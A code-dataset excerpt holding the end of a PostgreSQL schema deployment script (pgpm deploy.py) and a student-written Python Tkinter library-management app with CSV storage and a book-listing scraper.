owner_role = arguments['--owner'][0]\n else:\n owner_role = ''\n files_deployment = arguments['--file'] # if specific script to be deployed, only find them\n if arguments['install']:\n install_manager(arguments[''])\n elif arguments['deploy']:\n # Load project configuration file\n print('\\n' + TermStyle.PREFIX_INFO + 'Loading project configuration...')\n config_json = open(_variables.CONFIG_FILE_NAME)\n config_data = json.load(config_json)\n config_json.close()\n if arguments['--add-config']:\n print('\\n' + TermStyle.PREFIX_INFO + 'Adding additional configuration file {0}'.\n format(arguments['--add-config']))\n add_config_json = open(arguments['--add-config'])\n config_data = dict(list(config_data.items()) + list(json.load(add_config_json).items()))\n add_config_json.close()\n config_obj = config.SchemaConfiguration(config_data)\n\n # Check if owner role and user roles are to be defined with config files\n if not owner_role and config_obj.owner_role:\n owner_role = config_obj.owner_role\n if not user_roles and config_obj.user_roles:\n user_roles = config_obj.user_roles\n\n print(TermStyle.PREFIX_INFO + 'Configuration of project {0} of version {1} loaded successfully.'\n .format(config_obj.name, config_obj.version.to_string()))\n\n # Get scripts\n types_script, types_files_count = get_scripts(\"types_path\", config_data, files_deployment, \"types\")\n functions_script, functions_files_count = get_scripts(\"functions_path\", config_data, files_deployment,\n \"functions\")\n views_script, views_files_count = get_scripts(\"views_path\", config_data, files_deployment, \"views\")\n tables_script, tables_files_count = get_scripts(\"tables_path\", config_data, files_deployment, \"tables\")\n triggers_script, triggers_files_count = get_scripts(\"triggers_path\", config_data, files_deployment, \"triggers\")\n\n # Connect to DB\n conn, cur = connect_db(arguments[''])\n # Check if DB is pgpm enabled\n if not schema_exists(cur, _variables.PGPM_SCHEMA_NAME):\n print('\\n' + TermStyle.PREFIX_ERROR + 'Can\\'t deploy schemas to DB where pgpm was not installed. '\n 'First install pgpm by running pgpm install')\n close_db_conn(cur, conn, arguments[''])\n sys.exit(1)\n\n # Prepare and execute preamble\n _deployment_script_preamble = pkgutil.get_data('pgpm', 'scripts/deploy_prepare_config.sql')\n print(TermStyle.PREFIX_INFO + 'Executing a preamble to deployment statement')\n # print(_deployment_script_preamble)\n cur.execute(_deployment_script_preamble)\n\n # Get schema name from project configuration\n schema_name = ''\n if config_obj.subclass == 'versioned':\n schema_name = '{0}_{1}'.format(config_obj.name, config_obj.version.to_string())\n print(TermStyle.PREFIX_INFO + 'Schema {0} will be updated'.format(schema_name))\n elif config_obj.subclass == 'basic':\n schema_name = '{0}'.format(config_obj.name)\n if not arguments['--file']:\n print(TermStyle.PREFIX_INFO + 'Schema {0} will be created/replaced'.format(schema_name))\n else:\n print(TermStyle.PREFIX_INFO + 'Schema {0} will be updated'.format(schema_name))\n\n # Create schema or update it if exists (if not in production mode) and set search path\n if arguments['--file']: # if specific scripts to be deployed\n if not schema_exists(cur, schema_name):\n print(TermStyle.PREFIX_ERROR + 'Can\\'t deploy scripts to schema {0}. Schema doesn\\'t exist in database'\n .format(schema_name))\n close_db_conn(cur, conn, arguments.get(''))\n sys.exit(1)\n else:\n _set_search_path_schema_script = SET_SEARCH_PATH.format(schema_name)\n cur.execute(_set_search_path_schema_script)\n print(TermStyle.PREFIX_INFO +\n 'Search_path was changed to schema {0}'.format(schema_name))\n else:\n if not schema_exists(cur, schema_name):\n create_db_schema(cur, schema_name, user_roles, owner_role)\n elif arguments['--mode'][0] == 'safe':\n print(TermStyle.PREFIX_ERROR +\n 'Schema already exists. It won\\'t be overriden in safe mode. Rerun your script without '\n '\"-m moderate\" or \"-m unsafe\" flags')\n close_db_conn(cur, conn, arguments.get(''))\n sys.exit(1)\n elif arguments['--mode'][0] == 'moderate':\n _old_schema_exists = True\n _old_schema_rev = 0\n while _old_schema_exists:\n cur.execute(\"SELECT EXISTS (SELECT schema_name FROM information_schema.schemata \"\n \"WHERE schema_name = '{0}');\".format(schema_name + '_' + str(_old_schema_rev)))\n _old_schema_exists = cur.fetchone()[0]\n if _old_schema_exists:\n _old_schema_rev += 1\n _old_schema_name = schema_name + '_' + str(_old_schema_rev)\n print(TermStyle.PREFIX_INFO +\n 'Schema already exists. It will be renamed to {0} in moderate mode. Renaming...'\n .format(_old_schema_name))\n _rename_schema_script = \"ALTER SCHEMA {0} RENAME TO {1};\\n\".format(schema_name, _old_schema_name)\n cur.execute(_rename_schema_script)\n # Add metadata to pgpm schema\n cur.execute(SET_SEARCH_PATH.format(_variables.PGPM_SCHEMA_NAME))\n cur.callproc('{0}._add_package_info'.format(_variables.PGPM_SCHEMA_NAME),\n [config_obj.name,\n config_obj.subclass,\n _old_schema_rev,\n config_obj.version.major,\n config_obj.version.minor,\n config_obj.version.patch,\n config_obj.version.pre,\n config_obj.version.metadata,\n config_obj.description,\n config_obj.license])\n print(TermStyle.PREFIX_INFO + 'Schema {0} was renamed to {1}. Meta info was added to {2} schema'\n .format(schema_name, _old_schema_name, _variables.PGPM_SCHEMA_NAME))\n create_db_schema(cur, schema_name, user_roles, owner_role)\n else:\n _drop_schema_script = \"DROP SCHEMA {0} CASCADE;\\n\".format(schema_name)\n cur.execute(_drop_schema_script)\n print(TermStyle.PREFIX_INFO + 'Dropping old schema {0}'.format(schema_name))\n create_db_schema(cur, schema_name, user_roles, owner_role)\n\n # Reordering and executing types\n if types_files_count > 0:\n if arguments['--file']:\n print(TermStyle.PREFIX_ERROR +\n 'Deploying types definition scripts in existing schema without dropping it first '\n 'is not support yet. Skipping')\n sys.exit(1)\n else:\n type_ordered_scripts, type_unordered_scripts = reorder_types(types_script)\n # uncomment for debug\n # print(TermStyle.BOLD_ON + TermStyle.FONT_WHITE + '\\n'.join(type_ordered_scripts))\n if type_ordered_scripts:\n cur.execute('\\n'.join(type_ordered_scripts))\n if type_unordered_scripts:\n cur.execute('\\n'.join(type_unordered_scripts))\n print(TermStyle.PREFIX_INFO + 'Types loaded to schema {0}'.format(schema_name))\n else:\n print(TermStyle.PREFIX_INFO + 'No type scripts to deploy')\n\n # Executing functions\n if functions_files_count > 0:\n print(TermStyle.PREFIX_INFO + 'Running functions definitions scripts')\n # print(TermStyle.HEADER + functions_script)\n cur.execute(functions_script)\n print(TermStyle.PREFIX_INFO + 'Functions loaded to schema {0}'.format(schema_name))\n else:\n print(TermStyle.PREFIX_INFO + 'No function scripts to deploy')\n\n # Executing views\n if views_files_count > 0:\n print(TermStyle.PREFIX_INFO + 'Running views definitions scripts')\n # print(TermStyle.HEADER + views_script)\n cur.execute(views_script)\n print(TermStyle.PREFIX_INFO + 'Views loaded to schema {0}'.format(schema_name))\n else:\n print(TermStyle.PREFIX_INFO + 'No view scripts to deploy')\n\n # Executing tables\n if tables_files_count > 0:\n print(TermStyle.PREFIX_WARNING + 'Support for DDL or data updates is not implemented yet')\n else:\n print(TermStyle.PREFIX_INFO + 'No DDL or data update scripts to deploy')\n\n # Executing triggers\n if triggers_files_count > 0:\n print(TermStyle.PREFIX_INFO + 'Running views definitions scripts')\n # print(TermStyle.HEADER + triggers_script)\n cur.execute(triggers_script)\n print(TermStyle.PREFIX_INFO + 'Views loaded to schema {0}'.format(schema_name))\n else:\n print(TermStyle.PREFIX_INFO + 'No view scripts to deploy')\n\n # Add metadata to pgpm schema\n cur.execute(SET_SEARCH_PATH.format(_variables.PGPM_SCHEMA_NAME))\n cur.callproc('{0}._add_package_info'.format(_variables.PGPM_SCHEMA_NAME),\n [config_obj.name,\n config_obj.subclass,\n None,\n config_obj.version.major,\n config_obj.version.minor,\n config_obj.version.patch,\n config_obj.version.pre,\n config_obj.version.metadata,\n config_obj.description,\n config_obj.license])\n _after_deploy_script = pkgutil.get_data('pgpm', 'scripts/after_deploy.sql')\n cur.execute(_after_deploy_script)\n print(TermStyle.PREFIX_INFO + 'Meta info about deployment was added to schema {0}'.format(_variables.PGPM_SCHEMA_NAME))\n\n # Commit transaction\n conn.commit()\n\n close_db_conn(cur, conn, arguments.get(''))\n\n else:\n print(arguments)\n\nif __name__ == '__main__':\n main()\n","sub_path":"pgpm/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":22173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"435777314","text":"# -*- coding:utf-8 -*-\r\n'''\r\n 图书管理系统\r\n 碎碎念见最下方\r\n 打包命令,切记要把exe放进csv在的文件夹...\r\n pyinstaller -F D:\\Kiwi\\Code\\Assignments\\library_management\\lib_manage.py --noconsole\r\n'''\r\nimport random\r\nimport string\r\nimport time\r\nimport requests\r\nimport csv\r\nimport re\r\nimport tkinter as tk\r\nfrom tkinter import ttk\r\nfrom tkinter import messagebox\r\nfrom bs4 import BeautifulSoup\r\n\r\nfrom collections import Iterable\r\n\r\n# 好像明文储存有点过分不安全了...干脆不检测密码了\r\n# 优化要在完成之后!\r\nUSR_IMPORT_PATH = 'data\\datausr.csv'\r\nBOOK_IMPORT_PATH = 'data\\databook.csv'\r\nBOOK_STORAGE_PATH = 'data\\databook.csv'\r\nLOGIN_PWD = 'PWD'\r\nMAX_USR = 20\r\n# data_columns = ['书籍名称', '可借复本', '馆藏复本', '作者或译者', '地址'] # 好像没用上\r\n\r\nclass usr:\r\n def __init__(self, id, name):\r\n self.name = name\r\n self.id = id\r\n self.__pwd = LOGIN_PWD\r\n\r\nclass book:\r\n def __init__(self, name=None, id=None, avaliable=None, all=None, author=None, addr=None):\r\n self.nm = name\r\n self.id = id\r\n self.ava = avaliable\r\n self.all = all\r\n self.athr = author\r\n self.addr = addr\r\n self.hstry = []\r\n def dis(self):\r\n print('书籍名称:{0}\\n索书号:{1}\\n可借复本:{2}\\n馆藏复本:{3}\\n作者或译者:{4}\\n地址:{5}'\\\r\n .format(self.nm, self.id, self.ava, self.all, self.athr, self.addr))\r\n def opr(self, reader, opr):\r\n if opr =='lend':\r\n self.hstry.append('****操作:借出****用户名:%s****用户编号:%s****操作时间:%s'\\\r\n %(reader.nm, reader.id, time.ctime()))\r\n # print(self.hstry[-1])\r\n elif opr =='return':\r\n self.hstry.append('****操作:归还****用户名:%s****用户编号:%s****操作时间:%s'\\\r\n %(reader.nm, reader.id, time.ctime()))\r\n # print(self.hstry[-1])\r\n else : print('图书操作失败!')\r\n def prnt_hstry(self):\r\n if len(self.hstry) == 0:\r\n print('暂无借阅记录')\r\n else:\r\n print('\\n'.join(self.hstry))\r\n\r\nclass rd(usr):\r\n def __init__(self, id, name, *history):\r\n super().__init__(id, name)\r\n self.id = id\r\n self.type = 'Reader'\r\n self.b_book = []\r\n if history:\r\n # self.hstry = [{'name': 'test', 'opr': 'test', 'time': 'test'}]\r\n self.hstry = []\r\n # class opr_history():\r\n # def __init__(self, name, operate, time):\r\n # self.name = name\r\n # self.operate = operate\r\n # self.time = time\r\n\r\n def opr(self, book, opr):\r\n # book.opr(self, opr)\r\n # print('from usr class', self.hstry)\r\n\r\n if opr =='lend':\r\n # self.hstry.append(self.opr_history(book.nm, 'lend', time.time()))\r\n self.b_book.append(book.nm)\r\n # self.hstry.append({'name': book.nm, 'opr': 'lend', 'time': time.time()})\r\n self.hstry.append('****借入%s 编号:%s 操作时间:%s'%(book.nm, book.id, time.ctime()))\r\n\r\n elif opr =='return':\r\n # self.hstry.append(self.opr_history(book.nm, 'return', time.time()))\r\n self.b_book.remove(book.nm)\r\n # self.hstry.append({'name': book.nm, 'opr': 'return', 'time': time.time()})\r\n self.hstry.append('****归还%s 编号:%s 操作时间:%s' % (book.nm, book.id, time.ctime()))\r\n\r\n else:\r\n print('用户操作失败!')\r\n # def prnt_hstry(self):\r\n # if len(self.hstry)==0:\r\n # print('暂无借阅记录')\r\n # else:\r\n # print('\\n'.join(self.hstry))\r\n\r\nclass admin(usr):\r\n def __init__(self, id, name):\r\n super().__init__(id, name)\r\n self.type = 'Admin'\r\n # self.hstry = history\r\n\r\n def import_data(self, path):\r\n with open(path) as data_file:\r\n reader = csv.reader(data_file)\r\n data_cache = []\r\n for each_line in reader:\r\n if len(each_line) == 0:\r\n continue\r\n else:\r\n data_cache.append(each_line)\r\n # print(each_line)\r\n return data_cache\r\n\r\n # def add_book(self, book_name, no=None, valid='1', all='1', author=None, addr=None):\r\n # lib.lib_add_bk(book_name, no, valid, all, author, addr)\r\n # def edit_book(self, book_name, target, new_value):\r\n # lib.lib_edit_bk(book_name, target, new_value)\r\n # def del_book(self, book):\r\n # pass\r\n\r\nclass login_page:\r\n def __init__(self):\r\n self.login = tk.Tk()\r\n self.login.title('登陆窗口')\r\n self.login.geometry('300x420')\r\n self.text = tk.Label(text='欢迎登陆\\n用户图书管理系统', font=('Arial', 24))\\\r\n .pack(pady=20)\r\n self.name = tk.Label(text='用户名:').place(x=50, y=180)\r\n self.usr_name = tk.Entry()\r\n self.usr_name.place(x=100, y=180)\r\n self.name = tk.Label(text='密码:').place(x=50, y=240)\r\n self.usr_pwd = tk.Entry()\r\n self.usr_pwd.place(x=100, y=240)\r\n self.submit = tk.Button(text='登陆', command=lambda: self.usr_login(), width=10)\\\r\n .place(x=50, y=300)\r\n self.exit = tk.Button(text='退出', command=lambda: self.usr_exit(), width=10)\\\r\n .place(x=170, y=300)\r\n self.login.mainloop()\r\n\r\n def usr_login(self):\r\n self.name = self.usr_name.get()\r\n self.pwd = self.usr_pwd.get()\r\n with open(USR_IMPORT_PATH, 'r', newline='') as user_list:\r\n reader = csv.reader(user_list)\r\n check_flag = False\r\n for each_line in reader:\r\n if self.name == each_line[1]:\r\n check_flag = True\r\n if each_line[2] == 'admin':\r\n # 'user id', 'user name', 'history'\r\n self.a_admin = admin(each_line[0], each_line[1])\r\n self.a_admin_page = admin_page(usr_class=self.a_admin, parent=self.login, usr_name='admin')\r\n break\r\n elif each_line[2] == 'reader':\r\n self.a_rd = rd(each_line[0], each_line[1], each_line[3])\r\n self.a_rd_page = rd_page(self.a_rd, self.login, 'reader_1')\r\n break\r\n if not check_flag:\r\n messagebox.showwarning(title='警告', message='登陆失败! 请检查用户名')\r\n\r\n def usr_exit(self):\r\n self.login.destroy()\r\n\r\nclass main_page:\r\n def __init__(self, usr_class, parent=None, usr_name='null'):\r\n if parent is not None:\r\n parent.destroy()\r\n self.usr_class = usr_class\r\n self.usr_name = usr_name\r\n self.main = tk.Tk()\r\n self.main.title('用户图书管理系统')\r\n # 划分主要区域\r\n self.left_top_frm = tk.Frame(width=200, height=300)\r\n self.left_top_frm.grid(row=0, column=0, sticky='NW', padx=20, pady=10)\r\n self.left_down_frm = tk.Frame(width=200, height=300)\r\n self.left_down_frm.grid(row=1, column=0, sticky='NW', padx=40, pady=10)\r\n self.right_frm = tk.Frame(width=600, height=600)\r\n self.right_frm.grid(row=0, column=1, rowspan=2, sticky='NW', padx=20, pady=10)\r\n # 左上的部件\r\n self.welc_msg = tk.Label(self.left_top_frm, text=\"欢迎回来!\", font=('Verdana', 12))\\\r\n .grid(row=0, column=1, ipady=5, sticky='w')\r\n self.time = tk.Label(self.left_top_frm, text=time.strftime('%y-%m-%d %I:%M:%S %p'), font=('Verdana', 12))\r\n self.time.grid(row=1, column=1, ipady=5, sticky='w')\r\n self.usr_info = tk.Label(self.left_top_frm, text=\"用户ID: %s\" % self.usr_class.id, font=('Verdana', 12))\\\r\n .grid(row=2, column=1, ipady=5, sticky='w')\r\n self.usr_name = tk.Label(self.left_top_frm, text=\"用户名:%s\" % self.usr_name, font=('Verdana', 12))\\\r\n .grid(row=3, column=1, ipady=5, sticky='w')\r\n self.usr_type = tk.Label(self.left_top_frm, text=\"用户类型:管理员\", font=('Verdana', 12))\r\n self.usr_type.grid(row=4, column=1, ipady=5, sticky='w')\r\n # 左下角部件\r\n self.find = tk.Entry(self.left_down_frm, width=20, fg='gray')\r\n self.find.insert(index=0, string='请输入查找内容')\r\n self.find.bind('', func=self.find_book)\r\n self.find.bind('', func=self.dis_res)\r\n self.find.grid(row=0, column=1, pady=5)\r\n self.b1 = tk.Button(self.left_down_frm, text='', width=20, command=None)\r\n self.b1.grid(row=1, column=1, pady=5)\r\n self.b2 = tk.Button(self.left_down_frm, text='', width=20, command=None)\r\n self.b2.grid(row=2, column=1, pady=5)\r\n self.b3 = tk.Button(self.left_down_frm, text='', width=20, command=None)\r\n self.b3.grid(row=3, column=1, pady=5)\r\n self.b4 = tk.Button(self.left_down_frm, text='', width=20, command=None)\r\n self.b4.grid(row=4, column=1, pady=5)\r\n self.exit = tk.Button(self.left_down_frm, text='退出', width=20, command=lambda: self.usr_exit(self.usr_class))\r\n self.exit.grid(row=5, column=1, pady=5)\r\n # 右侧的treeview\r\n self.columns = ('书籍名称', '索书号', '可借复本', '馆藏复本', '作者或译者', '地址')\r\n self.book_list = ttk.Treeview(self.right_frm, show='headings', height=20, columns=self.columns)\r\n # self.book_list.bind('', self.find_book)\r\n self.scroll = ttk.Scrollbar(self.right_frm, orient='vertical', command=self.book_list.yview)\r\n self.book_list.configure(yscrollcommand=self.scroll.set)\r\n # 这里只是用来设定宽度\r\n self.book_list.column('书籍名称', width=120, anchor='center')\r\n self.book_list.column('索书号', width=100, anchor='center')\r\n self.book_list.column('可借复本', width=50, anchor='center')\r\n self.book_list.column('馆藏复本', width=50, anchor='center')\r\n self.book_list.column('作者或译者', width=150, anchor='center')\r\n self.book_list.column('地址', width=200, anchor='center')\r\n self.book_list.grid(row=0, column=0, sticky='NSEW')\r\n self.scroll.grid(row=0, column=1, sticky='NS')\r\n # 绑定headings\r\n for i in self.columns:\r\n self.book_list.heading(i, text=i)\r\n # self.main.bind('', func=self.dis_res)\r\n self.update_time()\r\n\r\n def update_time(self):\r\n self.time.configure(text=time.strftime('%y-%m-%d %I:%M:%S %p'))\r\n self.time.after(ms=1000, func=self.update_time)\r\n\r\n def find_book(self, event):\r\n self.find.delete(0, len(self.find.get()))\r\n self.find.configure(fg='black')\r\n self.find.bind('', func=self.dis_res)\r\n\r\n def dis_res(self, event):\r\n # 没找到暂时没有提醒\r\n self.target = self.find.get()\r\n # print(self.book_list.selection())\r\n for each_selected in self.book_list.selection():\r\n self.book_list.selection_remove(each_selected)\r\n for each_col in self.book_list.get_children():\r\n for each_cell in self.book_list.item(each_col, 'values'):\r\n if self.target is not '' and self.target in each_cell:\r\n self.book_list.selection_add((each_col))\r\n self.book_list.move(each_col, '', 0)\r\n\r\n\r\n\r\n # def find_pop(self, event):\r\n # try:\r\n # self.find_entry\r\n # except NameError:\r\n # print('test')\r\n # else:\r\n # self.find_entry.destroy()\r\n # finally:\r\n # self.row = self.book_list.identify_row(event.y)\r\n # self.col = self.book_list.identify_column(event.x)\r\n # x, y, width, height = self.book_list.bbox(self.row, self.col)\r\n # print(self.row, self.col)\r\n # print(self.book_list.bbox(self.row, self.col))\r\n # self.find_entry = tk.Entry(self.book_list, '', width=width//4)\r\n # self.find_entry.place(x=x, y=y)\r\n # print(self.book_list.heading(column=self.col)['text'])\r\n # if self.book_list.identify_region(x=event.x, y=event.y) == 'heading':\r\n # pass\r\n # print(self.book_list.identify_region(x=event.x, y=event.y))\r\n\r\n def usr_exit(self, usr_class):\r\n\r\n with open(BOOK_STORAGE_PATH, 'w', newline='') as csvfile:\r\n print('saving books...')\r\n writer = csv.writer(csvfile)\r\n for each_line in self.book_list.get_children():\r\n writer.writerow(self.book_list.item(each_line, 'values'))\r\n with open(USR_IMPORT_PATH, 'a', newline='') as csvfile:\r\n print('saving users...')\r\n writer = csv.writer(csvfile)\r\n print(usr_class.type)\r\n if usr_class.type=='Reader':\r\n print(usr_class.id, usr_class.name, usr_class.type,\\\r\n ''.join(usr_class.b_book), ''.join(usr_class.hstry))\r\n writer.writerow([usr_class.id, usr_class.name, usr_class.type,\\\r\n ''.join(usr_class.hstry), ''.join(usr_class.b_book),])\r\n elif usr_class.type == 'Admin':\r\n writer.writerow([usr_class.id, usr_class.name, usr_class.type])\r\n self.main.destroy()\r\n login_again = login_page()\r\n login_again.login.mainloop()\r\n\r\n\r\nclass rd_page(main_page):\r\n def __init__(self, usr_class, parent=None, usr_name='null'):\r\n super().__init__(usr_class, parent, usr_name)\r\n # self.main.title('图书借阅管理系统') 切换title?\r\n self.usr_class = usr_class\r\n self.usr_type.configure(text=\"用户类型:读者\")\r\n self.b1.configure(text='借入', command=lambda: self.borr_book(self.usr_class,\\\r\n globals()['book_'+ str(self.book_list.index(self.book_list.selection()))]))\r\n self.b2.configure(text='归还', command=lambda: self.rtrn_book(self.usr_class,\\\r\n globals()['book_'+ str(self.book_list.index(self.book_list.selection()))]))\r\n self.b3.configure(text='已借书籍', command=lambda: self.dis_list(usr_class))\r\n self.b4.configure(text='借阅记录', command=lambda: self.dis_hstry(usr_class))\r\n\r\n with open(BOOK_STORAGE_PATH) as data_file:\r\n reader = csv.reader(data_file)\r\n i=0\r\n for each_line in reader:\r\n if len(each_line) == 0:\r\n continue\r\n else:\r\n globals()['book_'+ str(i)] = book(each_line[0], each_line[1], each_line[2],\\\r\n each_line[3],each_line[4], each_line[5])\r\n # '书籍名称:{0}\\n索书号:{1}\\n可借复本:{2}\\n馆藏复本:{3}\\n作者或译者:{4}\\n地址:{5}'\r\n i+=1\r\n self.book_list.insert('', 'end', values=each_line)\r\n self.update_time()\r\n self.main.mainloop()\r\n\r\n def borr_book(self, usr_class, book):\r\n if int(book.ava) > 0:\r\n book.ava = int(book.ava) - 1\r\n self.book_list.set(self.book_list.selection(), 2, book.ava)\r\n usr_class.opr(book, 'lend')\r\n print(usr_class.hstry)\r\n # messagebox.showinfo(message='借书成功!')\r\n else:\r\n messagebox.showwarning(message='书籍可借数量不足!')\r\n # self.ava = int(book.ava)\r\n # if self.ava > 0:\r\n # self.ava -= 1\r\n # self.book_list.set(self.book_list.selection(), 2, self.ava)\r\n # usr_class.opr(book, 'lend')\r\n # print(len(usr_class.hstry), usr_class.hstry[-1].name, 'lend', usr_class.hstry[-1].time)\r\n # messagebox.showinfo(message='借书成功!')\r\n # else:\r\n # messagebox.showwarning(title='警告', message='剩余书籍数量不足!')\r\n def rtrn_book(self, usr_class, book):\r\n if book.nm in usr_class.b_book:\r\n book.ava = int(book.ava) + 1\r\n self.book_list.set(self.book_list.selection(), 2, book.ava)\r\n usr_class.opr(book, 'return')\r\n print(usr_class.hstry[1:])\r\n else:\r\n messagebox.showinfo(message='未查询到借阅记录')\r\n\r\n def dis_list(self, usr_class):\r\n if len(usr_class.b_book) == 0:\r\n messagebox.showinfo(message='还没有借书哦')\r\n else:\r\n messagebox.showinfo(message='您的已借阅书籍为\\n %s'%'\\n '.join(usr_class.b_book))\r\n def dis_hstry(self, usr_class):\r\n if len(usr_class.b_book) == 0:\r\n messagebox.showinfo(message='未查询到借阅记录')\r\n else:\r\n messagebox.showinfo(message='您的已借阅记录为\\n%s' % '\\n'.join(usr_class.hstry))\r\n\r\n# def __init__(self, parent, usr_name='null'):\r\n# parent.destroy()\r\n# self.usr_name = usr_name\r\n# self.main = tk.Tk()\r\n# self.main.title('用户图书管理系统')\r\n# self.main.geometry('800x600')\r\n# self.clock = tk.Label(font=('Arial', 16), text='时间:%s' % time.ctime(), bg='#F8F8FF').place(x=450, y=10)\r\n# self.usr_info = tk.Label(font=('Arial', 16), text='用户名: %s\\n 用户权限:%s'%(self.usr_name, self.usr_type),\\\r\n# bg='#F8F8FF').place(x=50, y=30)\r\n# self.book_dis = tk.Button(text='查看', font=('Arial', 16), width=12, \\\r\n# command=lambda: self.book_dis).place(x=50, y=100)\r\n# self.book_edit = tk.Button(text='编辑', font=('Arial', 16), width=12, \\\r\n# command=lambda: self.book_dis).place(x=50, y=160)\r\n# self.book_add = tk.Button(text='添加', font=('Arial', 16), width=12, \\\r\n# command=lambda: self.book_dis).place(x=50, y=220)\r\n# self.book_del = tk.Button(text='删除', font=('Arial', 16), width=12, \\\r\n# command=lambda: self.book_dis).place(x=50, y=280)\r\n# self.main.mainloop()\r\n# def book_dis(self):\r\n# pass\r\nclass admin_page(main_page):\r\n def __init__(self, usr_class, parent=None, usr_name='null'):\r\n super().__init__(usr_class, parent, usr_name)\r\n\r\n self.b1.configure(text='导入', command=lambda: self.import_data())\r\n self.b2.configure(text='添加', command=lambda: self.add_book())\r\n self.b3.configure(text='删除', command=lambda: self.del_book())\r\n self.b4.configure(text='编辑', command=lambda: self.edit_book())\r\n self.main.mainloop()\r\n\r\n # GUI的函数全部只做按钮,以及管理员类的函数对接,不做文件操作\r\n # 这里有点问题就是点完确定主界面不会刷新, 叉掉才会刷新\r\n def add_book(self):\r\n # 在关闭窗口后才会刷新...\r\n add_page = book_details('书籍详情添加')\r\n self.main.wait_window(add_page.details)\r\n self.book_list.insert('', 'end', values=(add_page.book_info))\r\n\r\n def edit_book(self):\r\n edit_page = book_details('书籍详情编辑')\r\n self.main.wait_window(edit_page.details)\r\n count = 0\r\n for value in edit_page.book_info:\r\n if value != '':\r\n self.book_list.set(self.book_list.selection(), count, value)\r\n count += 1\r\n\r\n def del_book(self):\r\n self.book_list.delete(self.book_list.selection())\r\n # print(self.book_list.index(self.book_list.selection()))\r\n\r\n def import_data(self):\r\n # 没有加入数据的补全\r\n for each_line in self.usr_class.import_data(BOOK_IMPORT_PATH):\r\n self.book_list.insert('', 'end', values=each_line)\r\n\r\nclass book_details():\r\n def __init__(self, title):\r\n self.details = tk.Toplevel()\r\n self.details.title(title) #根据改查不同\r\n # self.details.geometry('400x300')\r\n\r\n self.msg = tk.Label(self.details, text='').grid(row=0)\r\n self.name_ = tk.Label(self.details, text='书籍名称:').grid(row=1, column=0, padx=20, pady=5)\r\n self.name = tk.Entry(self.details)\r\n self.name.grid(row=1, column=1, padx=20)\r\n self.id_ = tk.Label(self.details, text='索书号:').grid(row=2, column=0, pady=5)\r\n self.id = tk.Entry(self.details)\r\n self.id.grid(row=2, column=1)\r\n self.ava_ = tk.Label(self.details, text='可借复本:').grid(row=3, column=0, pady=5)\r\n self.ava = tk.Entry(self.details)\r\n self.ava.grid(row=3, column=1)\r\n self.all_ = tk.Label(self.details, text='馆藏复本:').grid(row=4, column=0, pady=5)\r\n self.all = tk.Entry(self.details)\r\n self.all.grid(row=4, column=1)\r\n self.ath_ = tk.Label(self.details, text='作者/译者:').grid(row=5, column=0, pady=5)\r\n self.ath = tk.Entry(self.details)\r\n self.ath.grid(row=5, column=1)\r\n self.addr_ = tk.Label(self.details, text='所在地址:').grid(row=6, column=0, pady=5)\r\n self.addr = tk.Entry(self.details)\r\n self.addr.grid(row=6, column=1)\r\n\r\n self.submit = tk.Button(self.details, text='确认', command = lambda: self.edit_submit())\r\n self.submit.grid(row=7, column=0, sticky='e', pady=20)\r\n self.cancel = tk.Button(self.details, text='取消', command=lambda: self.back())\r\n self.cancel.grid(row=7, column=1, pady=20)\r\n # self.submit = tk.Button(self.details, text='确认', command=lambda: self.edit_submit())\r\n # self.submit.grid(row=7, column=0, sticky='e', pady=20)\r\n # self.cancel = tk.Button(self.details, text='取消', command=lambda: self.back())\r\n # self.cancel.grid(row=7, column=1, pady=20)\r\n\r\n # self.hsty = tk.Label(self.details, text='这里是借阅历史')\r\n # self.hsty.grid(row=0, column=2, padx=20, pady=5)\r\n # self.details.mainloop()\r\n\r\n def edit_submit(self):\r\n self.book_info = []\r\n self.book_info = [self.name.get(), self.id.get(), self.ava.get(),\\\r\n self.all.get(), self.ath.get(), self.addr.get()]\r\n if len(self.book_info) == 0:\r\n messagebox.showwarning(title='警告', message='请输入要修改的内容')\r\n self.details.destroy()\r\n # 这里不知道为啥蹦不出来?\r\n\r\n def back(self):\r\n self.details.destroy()\r\n # new_main = admin_page()\r\n pass\r\n\r\ndef init_test_usr():\r\n print('Initializing some test users...')\r\n with open(USR_IMPORT_PATH, 'w', newline='') as csvfile:\r\n writer = csv.writer(csvfile)\r\n print('start writing...')\r\n writer.writerow(['user id', 'user name', 'user type', 'history'])\r\n writer.writerow(['0', 'admin', 'admin', 'NULL'])\r\n writer.writerow(['1', 'reader', 'reader', '1'])\r\n for i in range(MAX_USR):\r\n type = random.choice(['admin', 'reader'])\r\n writer.writerow([''.join(random.sample(string.digits, 3)),\\\r\n type+'_'+''.join(random.sample(string.ascii_letters, 3)),\\\r\n type, ''])\r\n print('Completed')\r\n\r\ndef go_get_some_books():\r\n print('finding the book details...')\r\n headers = {\r\n # 获取自浏览器开发工具network页签,请求详情中的resuest headers里\r\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 \\\r\n (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'\r\n }\r\n url = 'http://lib.ecust.edu.cn/books/advquery?type=%E7%BA%B8%E8%B4%A8&title=%E5%9B%BE%E4%B9%A6&author=&publish=&isbn=&callNo=&form_build_id=form-mdM6uT9s9O3wqxWNkPyKAP0WzKLU4g_omjvqw--FIdM&form_id=ecust_lib_form_book_adv_query&op=%E6%90%9C%E7%B4%A2'\r\n res = requests.get(url, headers=headers)\r\n # res.encoding = 'utf-8'\r\n soup = BeautifulSoup(res.text, 'html.parser')\r\n tlist = soup.find_all(class_='title')\r\n athr_list = soup.find_all(class_='author')\r\n addr_list = soup.find_all(class_='addr')\r\n with open(BOOK_IMPORT_PATH, 'w') as csvfile:\r\n writer = csv.writer(csvfile)\r\n print('start writing...')\r\n writer.writerow(['书籍名称', '索书号', '可借复本', '馆藏复本','作者或译者', '地址'])\r\n for i in range(len(tlist)):\r\n writer.writerow([tlist[i].text.split()[0], tlist[i].text.split()[-1],\\\r\n athr_list[i].text.split()[1], athr_list[i].text.split()[3],\\\r\n athr_list[i].text.split()[5], addr_list[i].text.split()[-1]])\r\n # print(tlist[i].text.split())\r\n # print(athr_list[i].text.split())\r\n # print(addr_list[i].text.split())\r\n print('Complete')\r\n\r\nif __name__ == '__main__':\r\n # init_test_usr()\r\n # 第一测试层级\r\n login_1st = login_page()\r\n # 第二测试层级\r\n # admin_test = admin('3', 'test')\r\n # admin_page = admin_page(admin_test, usr_name='admin')\r\n # 